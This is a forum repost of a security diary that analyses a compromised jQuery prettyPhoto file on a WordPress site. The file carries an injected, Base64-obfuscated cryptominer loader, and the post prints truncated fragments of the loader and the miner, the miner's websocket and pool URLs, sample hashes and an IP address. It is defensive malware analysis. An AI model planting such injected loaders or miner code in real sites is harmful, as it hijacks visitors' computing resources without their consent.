steven36 Posted July 13, 2018 Share Posted July 13, 2018 By Xavier Mertens Yesterday I found an interesting compromised JavaScript file that contains extra code to perform crypto mining activities. It started with a customer's IDS alerts on the following URL: hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js This website is not referenced as malicious and the domain looks clean. When you point your browser to the site, it loads the JavaScript file. So, I performed some investigations on this URL. jquery.prettyphoto.js is a file from the package pretty photo[1] but the one hosted on safeyourhealth[.]ru was modified. The original one starts like this: (function($) { $.prettyPhoto = {version: '3.1.4'}; $.fn.prettyPhoto = function(pp_settings) { pp_settings = jQuery.extend({ ... The malicious one started like this: new Function(atob(“dmFyIF8weDQ5ZTY9WydjYW5jZWxlZ...Y5ZignMHgyNycpXSgpOw=="))() (function($){$.prettyPhoto={version:'3.1.4'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({hook:'rel',animation_speed:'fast',ajaxcallback:function() ... The file was submitted to VT and received a score of 1/59[2]. atob() is the JavaScript function used to decode Base64. Let’s extract the payload and decode it: $ curl —socks5 ten:9050 hxxp://safeyourhealth[.]ru/wp-content/themes/wp-trustme/js/jquery.prettyphoto.js | \ grep atob | \ awk -F ‘“‘ ‘{ print $2 }’ | \ base64 -d >jquery.prettyphoto.js.decoded $ cat jquery.prettyphoto.js.decoded var _0x49e6=['canceled','error','opt_in_canceled','_connect','lastPingReceived','getItem','parse','ident','_updateTabs','waitReconnect','dontKillTabUpdate','setItem','stringify','stats','_hashString','charCodeAt','WEBSOCKET_SHARDS','_onMessage','onerror','_onError','onclose','onopen','_onOpen','anonymous','user','toString','type','token','goal','ref','opt_in','_send','_onClose','code','job','enabled','_adjustThreads','hash_accepted','hashes','accepted','authed','Bee\x20Error:','invalid_site_key','invalid_opt_in','reset','banned','_onTargetMet','job_id','submit','nonce','result','_onVerified','send','some_code','ifExclusiveTab','FORCE_EXCLUSIVE_TAB','forceExclusiveTab','forceMultiTab','User','Anonymous','Res','URL','webkitURL','mozURL','createObjectURL','worker','onReady','currentJob','verifyJob','verifyCallback','_isReady','lastMessageTimestamp','ready','Expecting\x20first\x20message\x20to\x20be\x20\x22ready\x22,\x20got\x ... The script is obfuscated with a very big array (_0x49e6) which contains pieces of strings and code. You can easily spot the behaviour of the script with the following snippet of code: var _0x348ae9 = navigator['hardwareConcurrency'] || 4; The navigator.hardwareConcurrency is a read-only property which returns the number of logical processors available to run threads on the computer. Always interesting for a cryptominer to know how many threads can be started. If the code was obfuscated, strings were not. More interesting strings are easy to find: self[_0x169f('0x98')][_0x169f('0x4b')] = { 'LIB_URL': _0x169f('0xb2'), 'ASMJS_NAME': _0x169f('0xb3'), 'REQUIRES_AUTH': ![], 'WEBSOCKET_SHARDS': [['wss://wss.rand.com.ru:8843/']], 'CAPTCHA_URL': 'https://coinhive.com/captcha/', 'MINER_URL': _0x169f('0xb4'), 'AUTH_URL': 'https://authedmine.com/authenticate.html' }; I wrote a VTI hunting rule to search for scripts containing the string "navigator['hardwareConcurrency']" and I got some hits last night. All of them where submitted for the first time yesterday and got a score of 6/59: 90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb 58c2c761ca127e6392f72ac60b7f6cbf20fa52db7e7f94468e1640ee3a132c21 56a2eebc67293799a01fa74a9d206ba336bc6df5c32ae68987d110e9bcd81cc2 90201bc4af1721b02cf441a80cdd94183b9bbcb0f63ee0aa9843cb02f3ae6bdb 7fa97e4b27e8542a0fc330bdd9cadccd1bafa166269a3bf846f7663b9f992be1 835a19b59e1e2aeeb538509022581202756ee13e78b4d1c6592918ec854168bb ded2b6d76a00a67c60f0488b2d0507334363314552edc31a1fd29fdbebc493f6 d920455b0d5f4783fb0fa3504ac14d540a3835774515cdc26284514ebad83f37 ad453a6563ee5e1c522a4405c57e0740db343ba180981f4da65a19b9b8aaa883 All of them use the same IP address: 148.251.136.203. I also searched for similar compromized jquery.prettyphoto.js files. This code is used on many websites but I did not find other malicious occurrences. Please share if you find some. [1] https://github.com/scaron/prettyphoto [2] https://www.virustotal.com/#/file/977a811695dbbd370e162807e4c0fbc25c9fda8bba3417279c2f8ee1289a47e6/detection Xavier Mertens (@xme) ISC Handler - Freelance Security Consultant Source Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.